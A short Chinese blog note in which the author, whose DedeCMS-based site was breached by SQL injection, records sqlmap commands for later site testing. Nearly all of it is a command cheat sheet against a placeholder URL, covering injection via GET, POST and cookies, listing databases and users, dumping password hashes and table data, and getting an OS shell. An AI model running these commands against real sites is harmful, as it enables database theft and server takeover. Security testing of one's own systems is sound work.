之前做的一个站,是用的织梦系统,里面加了一点自己的代码,由于很简单的东西,没做sql防注入,结果结果爆出漏洞了,用的是sqlmap,以前没怎么太关注过注入这一块,这回可是领教了,记录下这个东西的使用方法,以备以后检测网站用:
./sqlmap.py –h //查看帮助信息 ./sqlmap.py –u “http://www.anti-x.net/inject.asp?id=injecthere” //get注入 ./sqlmap.py –u “http://www.anti-x.net/inject.asp?id=injecthere” --data “DATA”//post注入 ./sqlmap.py –u “http://www.anti-x.net/inject.asp?id=injecthere” --cookie “COOKIE”//修改请求时的cookie ./sqlmap.py –u “http://www.anti-x.net/inject.asp?id=injecthere” --dbs //列数据库 ./sqlmap.py –u “http://www.anti-x.net/inject.asp?id=injecthere” –-users //列用户 ./sqlmap.py –u “http://www.anti-x.net/inject.asp?id=injecthere” –-passwords //获取密码hash ./sqlmap.py –u “http://www.anti-x.net/inject.asp?id=injecthere” –-tables -D DB_NAME //列DB_NAME的表 ./sqlmap.py –u “http://www.anti-x.net/inject.asp?id=injecthere” –-columns –T TB_NAME -D DB_NAME //读取TB_NAME中的列 ./sqlmap.py –u “http://www.anti-x.net/inject.asp?id=injecthere” –-dump –C C1,C2,C3 –T TB_NAME -D DB_NAME //读字段C1,C2,C3数据 ./sqlmap.py –u “http://www.anti-x.net/inject.asp?id=injecthere” –-os-shell //取得一个shell